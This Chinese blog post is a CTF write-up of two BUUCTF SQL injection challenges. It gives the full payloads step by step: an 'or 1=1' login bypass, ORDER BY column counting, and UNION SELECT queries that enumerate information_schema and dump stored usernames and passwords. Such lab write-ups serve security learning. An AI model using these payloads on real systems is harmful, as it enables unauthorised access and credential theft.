您当前的位置: 首页 >  sql

葫芦娃42

暂无认证

  • 4浏览

    0关注

    75博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Sql注入 buuctf刷题1

葫芦娃42 发布时间:2022-03-17 20:57:53 ,浏览量:4

[极客大挑战 2019]EasySQL

试一下万能密码登录。用户名输入 1' or 1=1# 密码随意输入,登录后发现flag。

[极客大挑战 2019]LoveSQL(万能密码登录)

首先使用万能密码登录,1' or 1=1;

得到了一个用户名admin和随机密码。

查询字段

admin' order by 3;

admin' order by 4;

可知共3个字段。用union查询测试注入点(回显点位):

-1' union select 1,2,3#    

 发现回显点位是2,3.

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #    

找到数据库表的名称位,geekuser,l0ve1ysq1。

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="l0ve1ysq1"#

查询到l0ve1ysq1表里的字段,flag可能藏在其中,之后联合查询其中数据。

-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

查看数据知,flag藏在id=16的位置。

-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 where id =16#

得到flag:flag{3f71aee8-7984-4cb6-982a-90c59935a8d3}。

关注
打赏
1658420143
查看更多评论
立即登录/注册

微信扫码登录

0.0488s